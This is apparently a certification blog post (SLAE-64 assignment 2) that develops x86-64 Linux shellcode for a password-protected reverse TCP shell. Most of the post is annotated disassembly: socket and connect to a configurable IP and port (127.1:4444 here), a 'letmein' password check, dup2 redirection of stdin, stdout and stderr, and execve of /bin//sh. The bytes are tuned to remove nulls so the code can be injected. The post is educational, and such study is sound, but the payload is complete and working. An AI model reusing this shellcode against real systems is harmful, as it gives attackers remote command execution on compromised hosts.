Tags: assembly, slae-64, shellcode
This post is the second of seven that will comprise my attempt at the SecurityTube Linux Assembly Expert (SLAE-64) certification. Each post will correspond to seven assignments of varying difficulty. I decided to take SLAE-64 to shore up my knowledge of assembly and shellcoding before diving in to OSCE.
The requirements for this assignment are almost identical to Assignment 1, as such this post will follow the same format. Also, because I’m a lazy programmer (in the good way), I will be reusing certain sections of code from the first assignment.
If you took a look at my first assignment, you know that it takes quite a few steps to create a bind shell. Thankfully, a reverse shell is much simpler. Those steps are as follows:
For testing, I used loopback as my IP address and port 4444. We can fire up Python again to help us prep these values for use in the assembly. If you’re unfamiliar with socket programming, the function name inet_pton
may sound a bit cryptic, but I’ll take this opportunity to quote the venerable Beej on the subject of inet_pton
and inet_ntop
These functions (pton and ntop) are for dealing with human-readable IP addresses and converting them to their binary representation for use with various functions and system calls. The “n” stands for “network”, and “p” for “presentation”. Or “text presentation”. But you can think of it as “printable”. “ntop” is “network to printable”.
- Beej
The htons
function stands for host to network short. Host to network conversion is very similar to what’s happening with the pton
function. The reason we do these conversions from host byte order to network byte order is that if you’re on a little-endian machine (intel to name one), your system needs to flip information to network byte order (big-endian). Basically, a choice had to be made to determine the order in which information traversed networks. The choice was big-endian, so that necessitates flipping things around on little-endian systems before sending data on its way. Endianness is an interesting topic (especially the origin of the term), but a more thorough explanation is beyond the scope of this post.
>>> import socket
>>> hex(socket.htons(4444))
'0x5c11'
>>> socket.inet_pton(socket.AF_INET, '127.1')[::-1]
'\x01\x7f'
After we’ve prepped the values, they can be defined at the top of the assembly so we can easily swap them to something different later on.
%define PORTNUMBER 0x5c11
%define IPADDR 0x017f
Once again, we start by creating a socket using the socket()
syscall. This should look very similar to what was covered in the first assignment. One thing that changed between my first post and this one is that I found that a mov reg reg
is one more opcode than push reg; pop reg
. Once I complete the other assignments, I plan to revisit the earlier ones and apply the things I pick up along the way such as this.
#define __NR_socket 41
int socket(int domain, int type, int protocol);
/*
* rax -> 41 -> socket sycall
* rdi -> 2 (AF_INET) -> domain
* rsi -> 1 (SOCK_STREAM) -> type
* rdx -> 0 -> protocol
*/
Original shellcode: 25 bytes
0000000000400080 <_start>:
400080: b8 29 00 00 00 mov eax,0x29
400085: bf 02 00 00 00 mov edi,0x2
40008a: be 01 00 00 00 mov esi,0x1
40008f: ba 00 00 00 00 mov edx,0x0
400094: 0f 05 syscall
400096: 48 89 c7 mov rdi,rax
My shellcode: 15 bytes
0000000000400080 <_start>:
400080: 6a 29 push 0x29
400082: 58 pop rax
400083: 6a 02 push 0x2
400085: 5f pop rdi
400086: 6a 01 push 0x1
400088: 5e pop rsi
400089: 31 d2 xor edx,edx
40008b: 0f 05 syscall
; copy socket descriptor to rdi for future use
40008d: 50 push rax
40008e: 5f pop rdi
To write the reverse shell, the socket needs to know about the IP and port to which we want to connect back. The sockaddr_in struct holds that information and is built using the stack since it’s too large to fit in a single register.
struct sockaddr_in {
sa_family_t sin_family; /* address family: AF_INET */
in_port_t sin_port; /* port in network byte order */
struct in_addr sin_addr; /* internet address */
};
You may have noticed that I used 127.1 as my loopback IP. This allowed me to push something equivalent to 127.0.0.1 onto the stack without any nulls. There are some other valid ways of representing IPv4 addresses such as a 32-bit integer. An example using a 32-bit integer to ping loopback is pictured below.
Original shellcode: 45 bytes
400099: 48 31 c0 xor rax,rax
40009c: 50 push rax
40009d: c7 44 24 fc 7f 00 00 mov DWORD PTR [rsp-0x4],0x100007f
4000a4: 01
4000a5: 66 c7 44 24 fa 11 5c mov WORD PTR [rsp-0x6],0x5c11
4000ac: 66 c7 44 24 f8 02 00 mov WORD PTR [rsp-0x8],0x2
4000b3: 48 83 ec 08 sub rsp,0x8
4000bc: 48 89 e6 mov rsi,rsp
My shellcode: 23 bytes
000000000040008f <populate_sockaddr_in>:
; assumption: rax contains result of socket syscall, use it to
; zero out rdx via sign extension (cdq)
40008f: 99 cdq
400090: 52 push rdx
400091: 52 push rdx
400092: 66 c7 44 24 04 7f 01 mov WORD PTR [rsp+0x4],0x17f
400099: 66 c7 44 24 02 11 5c mov WORD PTR [rsp+0x2],0x5c11
4000a0: c6 04 24 02 mov BYTE PTR [rsp],0x2
4000a4: 54 push rsp
4000a5: 5e pop rsi
The connect()
system call connects the socket referred to by the file descriptor sockfd to the address specified by addr.
#define __NR_connect 42
int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
/* rax -> 42
* rdi -> already contains server socket fd
* rsi -> already contains pointer to sockaddr_in with IP:PORT
* rdx -> length of sockaddr_in (16)
*/
Original shellcode: 12 bytes
4000b7: b8 2a 00 00 00 mov eax,0x2a
4000bf: ba 10 00 00 00 mov edx,0x10
4000c4: 0f 05 syscall
My shellcode: 8 bytes
00000000004000a6 <connect_call>:
4000a6: 6a 2a push 0x2a
4000a8: 58 pop rax
4000a9: 6a 10 push 0x10
4000ab: 5a pop rdx
4000ac: 0f 05 syscall
The next few sections are almost identical to my post for the first assignment. If you’d like a more in depth analysis of the following snippets of code, please head there and take a look. The only real difference between is that I started using push reg; pop reg
instead of mov reg, reg
. That difference will end up making these a few bytes shorter in some cases, but for the most part they’re the same.
#define __NR_read 0
ssize_t read(int fd, void *buf, size_t count);
/* rax -> 0
* rdi -> client already stored in rdi
* rsi -> 24 bytes allocated should be good
* rdx -> 24
*/
My shellcode: 36 bytes
00000000004000ae <read_call>:
4000ae: 31 c0 xor eax,eax
4000b0: 48 83 ec 18 sub rsp,0x18 ; allocate space on the stack
4000b4: 54 push rsp
4000b5: 5e pop rsi
4000b6: 6a 18 push 0x18
4000b8: 5a pop rdx
4000b9: 0f 05 syscall ; <-- user input stored rsi
00000000004000bb <compare>:
4000bb: 57 push rdi
4000bc: 41 59 pop r9 ; save server socket
4000be: 48 b8 6c 65 74 6d 65 movabs rax,0xa6e69656d74656c ; letmein\n
4000c5: 69 6e 0a
4000c8: 48 8d 3e lea rdi,[rsi]
4000cb: 48 af scas rax,QWORD PTR es:[rdi]
4000cd: 41 51 push r9
4000cf: 5f pop rdi ; restore server socket
; if password isn't right, close the server socket
4000d0: 75 2e jne 400100 <close_call>
Just like the bind shell, now we need to duplicate the file descriptors.
#define __NR_dup2 33
int dup2(int oldfd, int newfd);
/* rax -> 33
* rdi -> server socket
* rsi -> 2 -> 1 -> 0 (3 iterations)
*/
Original shellcode: 36 bytes
4000c6: b8 21 00 00 00 mov eax,0x21
4000cb: be 00 00 00 00 mov esi,0x0
4000d0: 0f 05 syscall
4000d2: b8 21 00 00 00 mov eax,0x21
4000d7: be 01 00 00 00 mov esi,0x1
4000dc: 0f 05 syscall
4000de: b8 21 00 00 00 mov eax,0x21
4000e3: be 02 00 00 00 mov esi,0x2
4000e8: 0f 05 syscall
My shellcode: 20 bytes
00000000004000d2 <dup2_calls>:
4000d2: 6a 03 push 0x3
4000d4: 59 pop rcx ; loop counter
4000d5: 6a 02 push 0x2
4000d7: 5b pop rbx ; used as file desciptor
00000000004000d8 <dup2_loop>:
4000d8: 6a 21 push 0x21
4000da: 58 pop rax
4000db: 89 de mov esi,ebx ; 2 -> 1 -> 0
4000dd: 51 push rcx ; store loop counter
4000de: 0f 05 syscall
4000e0: 59 pop rcx ; restore loop counter
4000e1: 48 ff cb dec rbx
4000e4: e2 f2 loop 4000d8 <dup2_loop>
Finally, it’s time to execve()
our shell. Once again, the only appreciable difference from this snippet and the corresponding section from the first assignment is the use of a different method of moving data between two registers. Also, included here is the label that marks where to jump when the user provides an incorrect password.
#define __NR_execve 59
int execve(const char *filename, char *const argv[], char *const envp[]);
/* rax -> 59
* rdi -> "/bin//sh", 0x0
* rsi -> [addr of bin/sh], 0x0
* rdx -> 0x0
*/
#define __NR_close 3
int close(int fd);
/* rax -> 3
* rdi -> fd already stored in rdi
*/
Original shellcode: 32 bytes
4000ea: 48 31 c0 xor rax,rax
4000ed: 50 push rax
4000ee: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
4000f5: 2f 73 68
4000f8: 53 push rbx
4000f9: 48 89 e7 mov rdi,rsp
4000fc: 50 push rax
4000fd: 48 89 e2 mov rdx,rsp
400100: 57 push rdi
400101: 48 89 e6 mov rsi,rsp
400104: 48 83 c0 3b add rax,0x3b
400108: 0f 05 syscall
My shellcode: 31 bytes
00000000004000e6 <exec_call>:
4000e6: 31 d2 xor edx,edx
4000e8: 52 push rdx
4000e9: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
4000f0: 2f 73 68
4000f3: 53 push rbx
4000f4: 54 push rsp
4000f5: 5f pop rdi
4000f6: 52 push rdx
4000f7: 57 push rdi
4000f8: 54 push rsp
4000f9: 5e pop rsi
4000fa: 48 8d 42 3b lea rax,[rdx+0x3b]
4000fe: 0f 05 syscall
0000000000400100 <close_call>:
400100: 6a 03 push 0x3
400102: 58 pop rax
400103: 0f 05 syscall
Here we have a functional password protected reverse shell. There are no nulls in the code and even after adding authentication, my shellcode ended up a tad smaller than the original (barely).
I’m looking forward to the egghunter assignment that is coming up next!
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert
Student ID: E64-1584
My SLAE-64 Assignments Repository